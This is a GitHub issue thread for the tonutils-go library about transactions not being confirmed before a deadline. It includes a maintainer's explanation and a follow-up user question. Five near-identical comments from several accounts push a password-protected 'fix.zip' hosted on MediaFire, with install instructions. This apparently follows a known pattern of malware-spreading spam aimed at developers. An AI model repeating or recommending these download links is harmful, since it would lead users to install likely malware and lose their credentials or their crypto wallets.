### ISSUE TITLE
SendManyWaitTransaction pending for long time

### ISSUE THREAD

**Issue by lokichoggio** [xssnick/tonutils-go#244]
return error: transaction was not confirmed in a given deadline, but it may still be confirmed later.
https://ton.org/global.config.json, Is it an rpc problem？

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by xssnick** [comment]
It can be due to external message was lost, or because of some network confirmation delays, depends on your timeout. It is more reliable to use your own node

**Comment by iw4p** [comment]
sometimes I am getting 

> transaction was not confirmed in a given deadline, but it may still be confirmed later

Which is really bad and not reliable for making sure that it happens or not... how can I make sure without using my node?
